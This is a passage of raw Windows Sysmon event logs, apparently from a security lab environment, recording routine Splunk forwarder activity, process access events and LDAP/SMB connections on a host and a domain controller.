Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.719{4F8D34B0-17DA-6216-1805-000000003902}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.593{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.311{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD933592A1480E633E7900DDCA834FB5,SHA256=701EF877A38D318CD92FC9CEDD973B93E8B0883552973AD6590F08C474FF360A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:46.839{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2C0A713BB81B45CF9C99DBB1FEC1AC9,SHA256=22620DC2C3964A02F7FA2E233A1AD3ECB179C3B188D329C3630547B91346E0F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:46.839{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=233505DE4E0704E0ECB005EBE29031F4,SHA256=5E5208DF5EA0E70348A85802DA58E0F2B7E2DC214B06350EAA63CC95E7AD6891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:46.055{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73329BF54A28D644523A841FDE9ED137,SHA256=ACF067647F2F582C942FB993A013E7FC4E28B57D876C2C6CB6DECBD69248F44E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.921{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EADE4A3AF6990709DB1DFFC09461A76D,SHA256=064659948EED8A7997A2CF087B12146E702DC25C2B0DE84C1E7F8923E1BD9464,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.765{4F8D34B0-17DB-6216-1905-000000003902}27282540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000221565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.577{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56FE8BDE2663DAAB52FFF2A9857143E0,SHA256=866B29D42B24847AC04C4FC75F19D5943E29581B4B37D0452A1941E54176C4FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.302{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49472-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000297699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.302{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49472-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000297698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.206{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49471-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.206{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49471-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.187{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49470-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:45.187{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49470-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000297694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:47.070{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4663165EA8D56E142D10ABA2D318BF3D,SHA256=904B11EBC923F4D43D6183E14C064F3AC6F0BCB4C0A7104788E2257001479B48,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17DB-6216-1905-000000003902}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221562Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-17DB-6216-1905-000000003902}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-17DB-6216-1905-000000003902}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:47.343{4F8D34B0-17DB-6216-1905-000000003902}2728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:48.577{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E09A81D1460D4CD1F954A4333D4A1E1,SHA256=B7141A5869EA5677BD3CF67EA8D75B2E9A90B8EE1508DABC274129DDD786CC51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:48.075{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97E7C53A30067F718A60B53C777E9132,SHA256=168AC74F27E42DD9EF2FB3B79EDDF3CDC9578A07DE56FB7C8B2B3C0EBBA0C3D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:46.029{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51659-false10.0.1.12-8089- 354300x8000000000000000221568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:45.576{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51658-false10.0.1.12-8000- 10341000x8000000000000000221599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.843{4F8D34B0-17DD-6216-1B05-000000003902}26483424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-17DD-6216-1B05-000000003902}2648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:49.608{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 